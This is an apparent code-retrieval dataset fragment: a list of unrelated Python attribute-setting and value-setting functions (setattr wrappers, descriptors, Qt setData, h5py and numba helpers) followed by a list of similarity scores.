#- self.file.h5commands.append(\"set attribute(%s:%s)-%s\" % (self.full_path,\n #- aid, value))", "def attribute_value(self, attribute_value):\n\n self._attribute_value = 
attribute_value", "def __set__(self, obj, value):\n\n return setattr(obj, '_' + self.name, value)", "def set_attribute(self, context: ResourceCommandContext, obj_ref: str, attr_name: str, attr_value: str) -> None:\n self.handler.set_attribute(obj_ref, attr_name, attr_value)", "def __setattr__(self, attr_k, val):\n # Dynamically setting the value of the Field\n try:\n attr = object.__getattribute__(self, attr_k)\n except AttributeError:\n attr = None\n if issubclass(attr.__class__, Field):\n attr.value = val\n else:\n return object.__setattr__(self, attr_k, val)", "def change_attr(self) -> None:\n\n self.attr = randint(0, 10)", "def _set_document_attribute(self, doc, row, mapping):\n # Unpack mapping info.\n try:\n attr, col_idx, convertor = mapping\n except ValueError:\n try:\n attr, col_idx = mapping\n except ValueError:\n print mapping\n raise ValueError()\n convertor = None\n\n # Convert cell value.\n if col_idx.find(\"-\") == -1:\n attr_value = self._get_cell_value(row, convert_col_idx(col_idx), convertor)\n else:\n col_idx_from, col_idx_to = [convert_col_idx(i) for i in col_idx.split(\"-\")]\n attr_value = [i for i in (self._get_cell_value(row, i, convertor)\n for i in range(col_idx_from, col_idx_to + 1)) if i]\n\n # Set aattribute value.\n setattr(doc, attr, attr_value)", "def set_value(self, value):\n for row in self.rows:\n row.set_values(value)", "def SetTarget(self, entity):\n\t\tself.target = entity", "def add_attribute(self, col, attr_name):\n # not optimised: not expected to be a usual operation\n new_table = np.c_[self.np_table, col]\n new_attributes = self.attributes + [attr_name]\n self.__init__(new_table, self.objects, new_attributes)", "def set_target(self, target):\n # parse target objects\n res = []\n targets = target.split(',')\n for item in targets:\n res.append(item)\n self.target = res\n \n # create conversion table for new index\n self.conversion = {}\n for i, cat in enumerate(self.target):\n self.conversion[cat] = f'{i}'", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def __setattr__(self, attr, value):\n return setattr(self.__instance, attr, value)", "def set_attribute(self, key: str, value: types.AttributeValue) -> None:\n if \"otel_attributes\" not in self.elastic_span.context:\n self.elastic_span.context[\"otel_attributes\"] = {}\n self.elastic_span.context[\"otel_attributes\"][key] = value", "def set_attr_impl(context, builder, sig, args, attr):\n typ, valty = sig.args\n target, val = args\n\n if attr in typ.struct:\n # It's a struct member\n inst = context.make_helper(builder, typ, value=target)\n data_ptr = inst.data\n data = context.make_data_helper(builder, typ.get_data_type(),\n ref=data_ptr)\n\n # Get old value\n attr_type = typ.struct[attr]\n oldvalue = getattr(data, _mangle_attr(attr))\n\n # Store n\n setattr(data, _mangle_attr(attr), val)\n context.nrt.incref(builder, attr_type, val)\n\n # Delete old value\n context.nrt.decref(builder, attr_type, oldvalue)\n\n elif attr in typ.jit_props:\n # It's a jitted property\n setter = typ.jit_props[attr]['set']\n disp_type = 
types.Dispatcher(setter)\n sig = disp_type.get_call_type(context.typing_context,\n (typ, valty), {})\n call = context.get_function(disp_type, sig)\n call(builder, (target, val))\n _add_linking_libs(context, call)\n else:\n raise NotImplementedError(\n 'attribute {0!r} not implemented'.format(attr))", "def set_h5py_attr(attrs, key, val):\n if isinstance(val, basestring):\n val = np.string_(val)\n elif isinstance(val, Iterable) and len(val) > 0:\n if isinstance(val[0], basestring):\n val = np.array(val, dtype='S')\n attrs[key] = val", "def target_id(self, target_id):\n\n self._target_id = target_id", "def set_value(attr_name, value, gpu_id):\n place = fluid.CPUPlace() if gpu_id < 0 \\\n else fluid.CUDAPlace(gpu_id)\n var = _fetch_var(attr_name, return_numpy=False)\n var.set(value, place)", "def set_col( self, col ):\n self.ix_col = col", "def setData(self, index, value, role=QtCore.Qt.DisplayRole):\n if self.verbose: print('myPandasModel.setData()')\n print(' myPandasModel.setData() row:', index.row(), 'column:', index.column(), 'value:', value, type(value))\n #if index.column() == self.includeCol:\n\n # dataChanged is inherited from QAbstractItemModel\n #topLeftIndex = index\n #bottomRightIndex = index\n #self.dataChanged.emit(index, index)\n\n if 1:\n\n #print('value:', value, type(value))\n v = self._data.iloc[index.row(), index.column()]\n #print('before v:',v, type(v))\n #print('isinstance:', isinstance(v, np.float64))\n if isinstance(v, np.float64):\n try:\n value = float(value)\n except (ValueError) as e:\n print('please enter a number')\n return False\n\n # set\n self._data.iloc[index.row(), index.column()] = value\n\n v = self._data.iloc[index.row(), index.column()]\n print(' after v:',v, type(v))\n return True\n return True", "def __setattr__(self, name, value):\n raise AttributeError(\"You cannot modify attributes on a %s\" % self.__class__.__name__)", "def setData(self, index, value):\n \n self.state[index.row()][index.column()] = value\n return value", "def __setitem__(self, attr, value):\n if attr in self._immutable.keys():\n raise ErrorInvalidField(\"You may not change the %s field\" \\\n % (attr,))\n super(ImmutableColumnFamily, self).__setitem__(attr, value)", "def setTarget(self, target):\n\n self._target = target", "def set_value (self):\n raise NotImplementedError", "def set(self):\n return AttributeFunctor(self, lambda x, y: y)", "def __setattr__(cls, name, value):\n if cls.__initialized and name not in _POST_INIT_ATTRIBUTE_NAMES:\n raise AttributeError('May not change values: %s' % name)\n else:\n type.__setattr__(cls, name, value)", "def __setattr__(self, attr, value):", "def __setattr__(self, attr, value):\r\n return setattr(self.__instance, attr, value)", "def __setattr__ (self, name, value):\n\t\ttry:\n\t\t\tself.__dict__[name] # Do not delete this line (it verifies the existence of an attribute)\n\t\t\t# Positioning of the existing attribute\n\t\t\tself.__dict__[name] = value\n\t\texcept KeyError:\n\t\t\t# The attribute does not exist is probably value of the structure\n\t\t\tself.__dict__[\"value\"][name] = value", "def __setattr__(self, name, value):\n assert name != 'cid' # can't see a reason to set a cid after construction\n self._set_attr(silent=False, **{name: value})", "def add_value(self, value, attr):\n self.index[value] = attr", "def __setattr__(self, attr, value):\n\t\treturn setattr(self.__instance, attr, value)", "def target(self, target) :\n\t\ttry :\n\t\t\tself._target = target\n\t\texcept Exception as e:\n\t\t\traise e", "def target(self, target) 
:\n\t\ttry :\n\t\t\tself._target = target\n\t\texcept Exception as e:\n\t\t\traise e", "def transform(self, X):\n\n X = super().transform(X)\n\n X[self.columns] = self.value\n\n return X", "def setValue(self, value):\n self.setValues((value, value))", "def set_attribute(self, name, value, comment):\n setattr(self, '%s__' % name, value_or_none(value))\n setattr(self, '%s__comment' % name, value_or_none(comment))", "def __setitem__(self, key, val):\r\n if not isinstance(key, basestring):\r\n raise TypeError\r\n if key not in self._columns.keys():\r\n raise KeyError\r\n return setattr(self, key, val)", "def set_attr(self, name: str, values: Union[list, tuple, object]):", "def __setitem__(self, feature, value):\n setattr(self, feature, value)", "def add_attribute(self, key, value):\n if key == \"process_step\":\n self.process_step = value\n elif key == \"source\":\n self.source = value\n else:\n self.attributes[key] = value", "def assign(self, value):\n self.value = value", "def _fset(self, value):\n # type: (...) -> None\n rtype = type_\n if isinstance(type_, TypeVar):\n type_map = dict(\n zip(self.__parameters__, self.__orig_class__.__args__)\n )\n rtype = type_map[type_]\n if not is_instance(value, rtype):\n raise TypeError(\n \"Cannot assign type of {} to attribute of type {}.\".format(\n _get_type_name(type(value)), _get_type_name(rtype)\n )\n )\n vars(self)[private_attr] = value" ]
[ "0.7223488", "0.69311714", "0.6659743", "0.65025675", "0.64680314", "0.64388746", "0.64149034", "0.63883615", "0.6383518", "0.63276327", "0.6326977", "0.6314786", "0.62230754", "0.62147987", "0.61330974", "0.6095479", "0.6058556", "0.6057366", "0.6056918", "0.6027524", "0.60270506", "0.602608", "0.60205853", "0.60176444", "0.601005", "0.6004293", "0.5941176", "0.5937554", "0.591173", "0.59069604", "0.58950204", "0.58945984", "0.58814204", "0.5881255", "0.5854663", "0.58532166", "0.5834929", "0.58336985", "0.58327425", "0.578196", "0.57815856", "0.5779111", "0.5769053", "0.57650256", "0.5756759", "0.57517874", "0.573666", "0.5731145", "0.5727346", "0.5685613", "0.56762123", "0.5671452", "0.5662832", "0.56442547", "0.5636912", "0.56360716", "0.56122", "0.56054705", "0.55772895", "0.5576523", "0.5575319", "0.55622965", "0.5561221", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.55563337", "0.5536808", "0.55197245", "0.5509459", "0.55050814", "0.54927117", "0.54847455", "0.54840446", "0.5482762", "0.5482369", "0.5479424", "0.54664093", "0.5456287", "0.5442012", "0.5435965", "0.54248106", "0.5421817", "0.54185784", "0.54110456", "0.54095584", "0.54047275", "0.5403697", "0.5403697", "0.5401307", "0.5399346", "0.5395221", "0.5394898", "0.5394842", "0.5389672", "0.5380771", "0.537941", "0.5376318" ]
0.0
-1
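The apply_column_value document in the record above embeds a small postal-code normalization ahead of its general cleaning step. Pulled out on its own — a hedged, slightly simplified re-statement for illustration, not SEED's actual helper — the behaviour looks like this:

def normalize_postal(value):
    value = str(value)
    if '-' in value:
        postal, ext = value.split('-', 1)
        # Zero-pad the 5-digit ZIP and the 4-digit extension separately.
        value = postal.zfill(5) + '-' + ext.zfill(4)
    # zfill(5) pads short plain ZIPs and is a no-op for the ZIP+4 form.
    return value.zfill(5)

print(normalize_postal(1234))       # -> 01234
print(normalize_postal("1234-56"))  # -> 01234-0056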
Go through the list of dictionaries and setup their keys.
def _set_default_concat_config(concat): concat = concat or [] if not isinstance(concat, list): concat = [concat] for c in concat: c['target'] = c.get('target', '__broken_target__') c['concat_columns'] = c.get('concat_columns', []) c['delimiter'] = c.get('delimiter', ' ') c['concat_values'] = {} return concat
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def example_dict_from_dict_list(dict_list,recursive=False):\n if not isinstance(dict_list,list):\n if isinstance(dict_list,dict):\n dict_list = [dict_list]\n else:\n raise TypeError(\"dict_list must be a dict or a list of dicts\")\n else:\n if not all([isinstance(x,dict) for x in dict_list]):\n raise TypeError(\"dict_list must be a dict or a list of dicts\")\n all_keys = set([])\n [all_keys.update(this_dict.keys()) for this_dict in dict_list] # this constructs a list of all keys encountered in the list of dicts\n example_dict = dict()\n keys_remaining_to_find = all_keys\n for this_dict in dict_list:\n new_keys = list(set(keys_remaining_to_find).intersection(this_dict.keys()))\n if not new_keys: continue\n new_dict = {k:this_dict[k] for k in new_keys if this_dict[k]} # keep only keys with non-empty and non-none value\n example_dict = dict(example_dict,**{k:v for k,v in new_dict.items()})\n keys_remaining_to_find = keys_remaining_to_find.difference(new_keys)\n if not keys_remaining_to_find: break # if there's no more keys to be found, you can quit\n\n if recursive==True:\n dict_list_keys = [k for k in example_dict.keys() if (k and is_dict_or_list_of_dicts(example_dict[k]))]\n for k in dict_list_keys:\n example_dict[k] = example_dict_from_dict_list(example_dict[k],recursive=True)\n return example_dict", "def _initialize_dicts(action_list):\n\n act_to_int = {}\n int_to_act = {}\n\n # Loop through the list and store it in the dictionaries\n for i, action in enumerate(action_list):\n act_to_int[action] = i\n int_to_act[i] = action\n\n return act_to_int, int_to_act", "def pair_keys(list_of_dicts, first_key, second_key):\n return [{ dictionary[first_key]: dictionary[second_key] } \n for dictionary in list_of_dicts]", "def _set_keys(self, listOfKeys):\n self._keys = listOfKeys", "def reorder_dict_HELPER(dict, key_list):\n temp_dict = {}\n\n for key in key_list:\n try:\n temp_dict[key] = dict[key]\n except KeyError:\n continue\n\n dict = temp_dict", "def _coalesce_dicts(self, list_of_dicts):\n coalesced_list_of_dicts = [{}]\n for item in list_of_dicts:\n found = False\n for dict_items in coalesced_list_of_dicts:\n if list(item.keys())[0] not in dict_items:\n dict_items.update(item)\n found = True\n break\n if not found:\n coalesced_list_of_dicts.append(item)\n return coalesced_list_of_dicts", "def initialize(self, keys: List[str]):", "def list_to_dict(list_of_dicts):\n output = defaultdict(list)\n for dict_ in list_of_dicts:\n for key, value in dict_.items():\n dict_[key].append(value)\n return dict(output)", "def create_dicts():\n load_data_for_dict('data/atis/train/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/valid/seq.in', 'data/atis/voc/vocabulary.json')\n load_data_for_dict('data/atis/test/seq.in', 'data/atis/voc/vocabulary.json') \n load_data_for_dict('data/atis/train/seq.out', 'data/atis/voc/slot_vocabulary.json')", "def iter_dict(iterator, keys, file_obj, defaults):\n result = []\n if len(keys):\n name = keys[0]\n rest = keys[1:]\n for item in resolve(iterator[name], **defaults):\n defaults['iter'][name] = item\n result += iter_dict(iterator, rest, file_obj, deepcopy(defaults))\n else:\n final_defaults = defaults\n final_defaults.update(resolve(file_obj.get('defaults', {}), **defaults))\n return [(file_obj, final_defaults)]\n return result", "def derive_url_dicts(self, url_obj_list):\n dict_list = []\n for url_obj in url_obj_list:\n dict_list.append(self.derive_url_dict(url_obj))\n return dict_list", "def setup_dict(self, keys=None):\n keys = keys or []\n 
return {key: True for key in keys}", "def update_dictionary_entries(word_list, the_dict):\n\tfor word in word_list:\n\t\tthe_dict[word] = True\n\treturn the_dict", "def createAllDictionaries(self):\r\n self.makeSentenceLengths()\r\n self.makeWords()\r\n self.makeStems()\r\n self.makeGerund()\r\n self.makeWordLengths()", "def builddictionary(dirlist):\n init_dictionary={}\n for string in dirlist:\n splitstring=string.split(\"\\t\")\n if len(splitstring) == 2:\n init_dictionary[splitstring[1].strip(\"\\n\")] = [int(splitstring[0]), 0]\n return init_dictionary", "def merge_dicts(listDicts) :\n return dict(itertools.chain.from_iterable([x.items() for x in listDicts]))", "def create_dicts_by_chain(keys_chain: list):\n result = {}\n current_dict = result\n for key in keys_chain:\n current_dict[key] = {}\n current_dict = current_dict[key]\n return result", "def build_keys():\n new_dct = {}\n with open( f'{stuff_dir}/02_source_booklist_2019-04-26.json', 'r', encoding='utf-8' ) as f:\n lst = json.loads( f.read() )\n for dct in lst:\n if dct['ISBN']: # some records are empty\n canonical_isbn = isbnlib.get_canonical_isbn( dct['ISBN'], output='isbn13' )\n new_dct[canonical_isbn] = { 'isbn_original': dct['ISBN'], 'title': dct['Title'], 'author': dct['Author'] }\n jsn = json.dumps( new_dct, sort_keys=True, indent=2 )\n log.debug( f'jsn, ```{jsn}```' )\n with open( f'{project_dir}/data/05_source_key_data.json', 'w', encoding='utf-8' ) as f:\n f.write( jsn )", "def init_data(stats_list):\n\n data = {stats_name: {} for stats_name in stats_list}\n return data", "def list_to_dict(list: list, keys: list):\n dictionary = dict()\n for key in keys:\n try:\n index = list.index(f'{key}:')\n dictionary[list[index].strip(':')] = list[index + 1]\n except ValueError:\n print(f'{key} not found!')\n return dictionary", "def from_list(self, lst: List[Tuple[keyType, valueType]]) -> None:\n key_size, value_size = self.size()\n if key_size > 0:\n # Clear the content of the existing custom dictionary object to the initial state.\n self.length = 10\n self.hashTable = [HeadNode() for i in range(self.length)]\n self.iter_head_node_index = 0\n self.iter_chain_node_index = -1\n self.iter_value_index = -1\n self.iter_values = []\n for element in lst:\n key = element[0]\n value = element[1]\n self.add(key, value)", "def dict_initialise(metadata, analysistype):\n for sample in metadata:\n sample[analysistype].dnaseq = dict()\n sample[analysistype].protseq = dict()\n sample[analysistype].ntindex = dict()\n sample[analysistype].aaindex = dict()\n sample[analysistype].ntalign = dict()\n sample[analysistype].aaalign = dict()\n sample[analysistype].aaidentity = dict()\n return metadata", "def _prefixed_items_from_list(items: List[namedtuple], item_prefix, prefix, tag_names: Set[str] = set([])):\n result = {}\n for index, nt in enumerate(items):\n result[\"%s%d\" % (item_prefix, index)] = _parse(nt, prefix, tag_names)\n return result", "def merge_animal_dict_list(dict_list):\n full = dict_list[0]\n for d in dict_list:\n full.update(d)\n return full", "def add_keys(destdict, srclist, value=None):\n if len(srclist) > 1:\n destdict[srclist[0]] = {}\n destdict[srclist[0]] = destdict.get(srclist[0], {})\n add_keys(destdict[srclist[0]], srclist[1:], value)\n else:\n destdict[srclist[0]] = value\n return destdict", "def secondary_keys_dicts(self):", "def list_flattened_to_dict(self, listH, defaultItem={}):\n dictList = defaultItem\n for name in reversed(listH):\n dictList = {name: dictList}\n return dictList", "def set_table_key(rows: 
List[Dict[str, str]], key: str) -> List[Dict[str, str]]:\n new_rows: List[Dict[str, str]] = []\n for row in rows:\n new_row = dict(row)\n new_row[\"_key\"] = new_row[key]\n new_rows.append(new_row)\n\n return new_rows", "def dictogram_dictlist(self):\n for key, value in self.word_dict.items():\n self.word_dict[key] = dictogram.Dictogram(value)\n # print(\"self.word_dict\", self.word_dict)", "def items_dict(slist, key=None):\n fields = slist.fields()\n items = [collections.OrderedDict((k, f) for k, f in zip(fields[0], item))\n for item in fields[1:]]\n if key:\n return collections.OrderedDict((i[key], i) for i in items)\n else:\n return items", "def create_dict(list_database):\n return_dict = dict()\n for key, value in list_database:\n if key != None:\n return_dict[key] = value\n return return_dict", "def iter_dicts(self, clean=False):\n for r in self.results:\n if clean:\n yield clean_dict(zip(self.attribute_names, r))\n else:\n yield dict(zip(self.attribute_names, r))", "def initpridict(cls):\n for i in range(len(clslist)):\n instcls = clslist[i]\n prilist = cls.pristage(instcls)\n configlist = cls.getConfigStages()\n tmpdict = dict()\n for j in range(len(configlist)):\n tmpdict.update(dict({configlist[j]: prilist[j]}))\n pridict.update(dict({instcls: tmpdict}))", "def initDictionary(bands):\r\n for x in bands:\r\n d[\"{}\".format(x)] = {ProdCost: [], AlbumSales: []}", "def init_from_dict(self, d):\n for k, v in d.items():\n # First, keys must be strings, not ints\n if isinstance(k, int):\n k = str(k)\n # Now, assign to the key, handling nested AttrDicts properly\n if isinstance(v, dict):\n self.set_key(k, AttrDict(v))\n elif isinstance(v, list):\n self.set_key(k, [i if not isinstance(i, dict) else AttrDict(i)\n for i in v])\n else:\n self.set_key(k, v)", "def prepare_looped_lines(self, alldict, comblist):\n loopline_dict=dict()\n for stridx in comblist:\n lidx = int(stridx.split('-')[0])\n loopidx = int(stridx.split('-')[1])\n loopline_dict[lidx] = alldict[lidx]['prepend'] + alldict[lidx]['looplist'][loopidx].strip() + alldict[lidx]['append'] + '\\n'\n return loopline_dict", "def crmdict2haresources(anydict):\n lst=[]\n for k in anydict.keys():\n d={}\n for subkey in anydict[k].keys() + ['name']:\n if subkey == 'name':\n d.setdefault(subkey, k)\n elif subkey == 'loadbalancers':\n numbalancers=len(anydict[k][subkey].keys())\n d.setdefault(subkey, [anydict[k][subkey]['ha%s' % lb] for lb in range(numbalancers)])\n elif subkey != 'members':\n d.setdefault(subkey, anydict[k][subkey])\n if 'type' not in d.keys():\n d.setdefault('type', 'ip')\n lst.append(d)\n return lst", "def _clean_up_loop_dict(loop_dict):\n \n # Remove the 'data_header' tag if it exists\n # since it is a list of dataframes\n # Then re-attach each of them one at a time\n if u'data_header' in loop_dict.keys():\n header_df_list = loop_dict.pop(u'data_header')\n \n if isinstance(header_df_list, list):\n for df in enumerate(header_df_list):\n loop_dict[u'data_header_'+str(df[0]+1)] = df[1]\n else:\n loop_dict[u'data_header_1'] = header_df_list\n \n return loop_dict", "def makeDict(result_list):\n \n result_dict = dict()\n for line in result_list:\n if line[0] == 'set_property' and line[3] == 'get_ports':\n if line[4] not in result_dict:\n result_dict[line[4]] = dict()\n result_dict[line[4]][line[1]] = line[2]\n\n return result_dict", "def create_topic_names_dict(self, topic_names_list):\n for item in topic_names_list:\n self.topic_names[int(item[0])] = item[1]", "def check_all_same_keys(dict_list, name):\n if len(dict_list) == 
0:\n return\n keys = dict_list[0].keys()\n for dct in dict_list:\n if keys != dct.keys():\n raise DGLError('Expect all {} to have the same set of keys, but got'\n ' {} and {}.'.format(name, keys, dct.keys()))", "def preprocess(\n self, data: List[Dict[str, Any]]\n ) -> Generator[Dict[str, Any], None, None]:\n raise NotImplementedError", "def convertListToOrderedDict(inList, defaultValue=0):", "def from_iterable(iterables):\n for it in iterables:\n for element in it:\n if isinstance(element, dict):\n for key in element:\n yield key\n else:\n yield element", "def _parseDictionary(self):\n for i in self.na_dict.keys():\n setattr(self, i, self.na_dict[i])", "def prepare_hw_dict(dictData):\n\tresult = defaultdict(list)\n\tfor (hw, meanings, verse, verseNumDetails, pageNumDetails) in dictData:\n\t\tallHeadWords = [hw] + meanings\n\t\tfor itm in allHeadWords:\n\t\t\tresult[itm].append((hw, meanings, verse, verseNumDetails, pageNumDetails))\n\treturn result", "def buildDict(self, dict):\n for x in dict:\n self.EntireSet.append(x)\n print self.EntireSet", "def normalize_server_list_json(server_list):\n myservers = dict()\n global most_fields\n #most_fields = dict()\n #most_fields = {'none': 0} # too lazy to make complex condition\n\n for server in server_list:\n \"\"\"\n Iterate over servers and cherry pick wanted variables/data\n \"\"\"\n myservers[server['name']] = {\n \"name\": server['name'],\n \"flavor_id\": server['flavor']['id'],\n \"flavor_name\": str(server['flavor']['name']),\n \"image_id\": server['image']['id'],\n \"region_name\": server['location']['region_name'],\n \"project_id\": server['location']['project']['id'],\n \"access_ip4\": server['accessIPv4'],\n \"access_ip6\": server['accessIPv6'],\n \"interface_ip4\": server['interface_ip'],\n \"created_at\": server['created_at'],\n \"updated_at\": server['updated'],\n \"terminated_at\": server['terminated_at'],\n \"status\": server['status'],\n \"power_state\": server['power_state'],\n \"provider_ip_zone\": server['RAX-PUBLIC-IP-ZONE-ID:publicIPZoneId'],\n \"host_id\": server['host_id'],\n \"id\": server['id'],\n \"tenant_id\": server['tenant_id']\n }\n\n # @TODO: move this to function add checks when some fields are missing\n if len(server['volumes']) > 0:\n i = 0\n for vol in server['volumes']:\n myservers[server['name']].update({\n \"vol\" + str(i) + '_id': vol['id'],\n \"vol\" + str(i) + '_name': vol['name'],\n \"vol\" + str(i) + '_status': vol['status'],\n \"vol\" + str(i) + '_size': vol['size'],\n \"vol\" + str(i) + '_created_at': vol['created_at'],\n \"vol\" + str(i) + '_updated_at': vol['updated_at'],\n \"vol\" + str(i) + '_type': vol['volume_type'],\n \"vol\" + str(i) + '_device': vol['device'],\n \"vol\" + str(i) + '_storage_node': vol['metadata']['storage-node'],\n #\"vol\" + str(i) + '_storage_mode': vol['metadata']['attached_mode'],\n \"vol\" + str(i) + '_server_id': vol['attachments'][0]['server_id'],\n \"vol\" + str(i) + '_attachment_id': vol['attachments'][0]['attachment_id'],\n \"vol\" + str(i) + '_host_name': vol['attachments'][0]['host_name'],\n \"vol\" + str(i) + '_volume_id': vol['attachments'][0]['volume_id'],\n \"vol\" + str(i) + '_az': vol['availability_zone']\n })\n i = i + 1\n\n else:\n myservers[server['name']].update({\n \"additional_storage\": 0\n })\n\n if int(len(myservers[server['name']])) > int(list(most_fields.values())[-1]):\n most_fields = dict()\n most_fields[server['name']] = int(len(myservers[server['name']]))\n\n # @TODO: add iteration via server['metadata'] when len > 0\n # @TODO: add iteration 
via server['properties'] when len > 0\n # @TODO: add iteration via server['addresses'] and dynamically add 'networks - Galaxy, public, private ..'\n\n return myservers", "def testLoadFromFileToDictKeyItemOrderingAcademic(self):\n list_of_academic = self.loaded_json_dict[self.expected_dict_keys[0]]\n self.assertEqual(list_of_academic[0].get_title(), self.academic_title)", "def prepare_looped_datasets(self, alldict, allcombs):\n datasets_dict=dict()\n numcombs = len(allcombs)\n combct = 0\n while combct < numcombs:\n newdata = list(self.baseinput.data)\n loopedlines = dict()\n loopedlines = self.prepare_looped_lines(alldict, allcombs[combct])\n for lvalidx in loopedlines.keys():\n newdata[lvalidx] = loopedlines[lvalidx]\n datasets_dict[combct] = newdata\n combct = combct + 1\n return datasets_dict", "def fix_json_keys(self, obj, callback):\n if type(obj) == list:\n newlist = []\n for item in obj:\n newlist.append(self.fix_json_keys(item, callback))\n return newlist\n elif type(obj) == dict:\n newdict = {}\n for item in list(obj):\n if type(obj[item]) == list or type(obj[item]) == dict:\n newdict[callback(item)] = self.fix_json_keys(obj[item], callback)\n else:\n newdict[callback(item)] = obj[item]\n return newdict", "def structure_user_dict_list(khoros_object=None, user_dicts=None, id_list=None, login_list=None):\n if not any((user_dicts, id_list, login_list)):\n raise errors.exceptions.MissingRequiredDataError(\"At least one of the required function arguments (i.e. \"\n \"'user_dicts', 'id_list' or 'login_list') must be provided.\")\n\n # Ensure that the user dictionary list is in the correct format\n user_dicts = [] if not user_dicts else user_dicts\n ids_from_dicts, logins_from_dicts = [], []\n if user_dicts:\n if isinstance(user_dicts, tuple):\n user_dicts = list(user_dicts)\n elif isinstance(user_dicts, dict):\n user_dicts = [user_dicts]\n user_dicts = core_utils.convert_dict_id_values_to_strings(user_dicts)\n ids_from_dicts = core_utils.extract_key_values_from_dict_list('id', user_dicts)\n logins_from_dicts = core_utils.extract_key_values_from_dict_list('login', user_dicts, exclude_if_present='id')\n\n # Retrieve the IDs from the list of logins if applicable\n ids_from_dicts.append(get_ids_from_login_list(khoros_object, logins_from_dicts))\n\n # Ensure that the supplied ID and login lists are in the correct format\n id_list = [] if not id_list else list(id_list)\n id_list = core_utils.convert_list_values(id_list, convert_to='str')\n login_list = [] if not login_list else list(login_list)\n\n # Add the IDs from the login list to the existing IDs list\n id_list.extend(get_ids_from_login_list(khoros_object, login_list))\n\n # Populate and return the final user dictionary list\n final_dict_list = []\n for user_id in id_list:\n final_dict_list.append({\"id\": str(user_id)})\n return final_dict_list", "def get_keys_from_list():\n json_data = request.get_json()\n\n d = dict()\n d['elements'] = list()\n settings.setOptionsFile(get_info('uid'))\n fn = settings.getHistoROOTFileName()\n rfn = settings.getReferenceROOTFileName()\n# open root file stored in the root database\n f = ROOT.TFile(fn)\n# open reference root file stored in the root database\n rf = ROOT.TFile(rfn)\n\n for values in json_data.itervalues():\n for k in values:\n subd = dict()\n subd[\"index\"] = k[\"index\"]\n if fn != k[\"file\"]: \n fn = k[\"file\"]\n settings.setHistoROOTFileName(fn)\n f = ROOT.TFile(fn)\n print \"histogram :>>>>>: \",k[\"histogram\"]\n subd[\"data\"] = eval(cppyy.gbl.getDictionary(f,k[\"histogram\"]))\n 
if rfn != k[\"referenceFile\"]: \n rfn = k[\"referenceFile\"]\n settings.setReferenceROOTFileName(rfn)\n rf = ROOT.TFile(rfn)\n subd[\"refdata\"] = eval(cppyy.gbl.getDictionary(rf,k[\"reference\"]))\n d['elements'].append(subd)\n\n f.Close()\n rf.Close()\n\n return jsonify(d)", "def test_dictify(self) -> None:\n r = dictify(['a', 'b', 'c'], [1, 2, 3])\n assert r == {'a': 1, 'b': 2, 'c': 3}, r\n\n r = {}\n dictify(['a'], [1], r)\n dictify(['b'], [2], r)\n dictify(['c'], [3], r)\n assert r == {'a': 1, 'b': 2, 'c': 3}, r", "def group_list_dict(matches, keys):\n target = collections.OrderedDict((key, []) for key in keys)\n for entry in matches:\n if entry is None:\n continue\n for key, value in entry.items():\n target[key].append(value)\n return target", "def list_to_dict_keys(list):\n dictionary = defaultdict(list)\n for item in list:\n dictionary[item] = ''\n return dictionary", "def dictupdate(*args):\n output = {}\n for dict in args:\n output.update(dict)\n return output", "def build_unq_dict_lst(self, lst1, lst2, key1 = \"start_index\", key2 = \"random_seed\"):\n dict_lst = []\n for i in range(len(lst1)):\n for j in range(len(lst2)):\n dictt = {}\n dictt[key1] = lst1[i]\n dictt[key2] = lst2[j]\n dict_lst.append(dictt)\n return dict_lst", "def navigate_case_dictionary(case_list_for_run, num_cases):", "def test_load_from_file_to_dict_key_names(self):\n self.assertEqual(list(self.loaded_json_dict), self.expected_dict_keys)", "def make_dicts(self):\n self._dicts = [tree.to_dict() for tree in self.reaction_trees]\n self._update_route_dict(self._dicts, \"dict\")", "def split_dictionary(dict_to_split, bases):\n dicts = list()\n for base in bases:\n if isinstance(base, dict):\n base_keys = base.keys()\n else:\n base_keys = base\n new_dict = dict()\n for key, value in dict_to_split.items():\n if key in base_keys:\n new_dict[key] = value\n dicts.append(new_dict)\n return dicts", "def init_objects(config_dict):\n # only testing purposes\n obj_list = dict()\n obj_list['input_cfg'] = config_dict\n return obj_list", "def buildDict(self, dict):\n for item in dict:\n length = len(item)\n if length not in self.dic:\n self.dic[length] = [item]\n else:\n self.dic[length].append(item)", "def addtodictionary(dict, dirlist):\n for string in dirlist:\n splitstring=string.split(\"\\t\")\n if len(splitstring) == 2:\n if splitstring[1].strip(\"\\n\") in dict:\n dict[splitstring[1].strip(\"\\n\")][1] = int(splitstring[0])\n else:\n dict[splitstring[1].strip(\"\\n\")] = [0, int(splitstring[0])]\n return dict", "def all_key_seqs(template):\n result = []\n for k, v in template.iteritems():\n if isinstance(v, dict):\n for suffix in all_key_seqs(v):\n result.append([k] + suffix)\n else:\n result.append([k])\n return result", "def nested_dict():\n try:\n num_list = [1, 2, 3, 4]\n new_dict = current = {}\n for name in num_list:\n current[name] = {}\n current = current[name]\n print(new_dict)\n except ValueError as e:\n logger.error(\"Not find the dictnary\"+str(e))", "def preprocessing_dict(selected_preprocessing_steps, reference_dict,stopwords, stemmer):\n list_keys = list(reference_dict.keys())\n list_values = list(reference_dict.values())\n list_keys_final = list_keys.copy()\n for i in selected_preprocessing_steps:\n if i == \"lowercase\":\n print(\"Lowercasing terms...\")\n list_keys_final = lowercase(list_keys_final)\n elif i == \"stopwords\":\n print(\"Removing stopwords...\")\n list_keys_final = remove_stopwords(list_keys_final,stopwords)\n elif i == \"stemming\":\n print(\"Stemming terms...\")\n list_keys_final = 
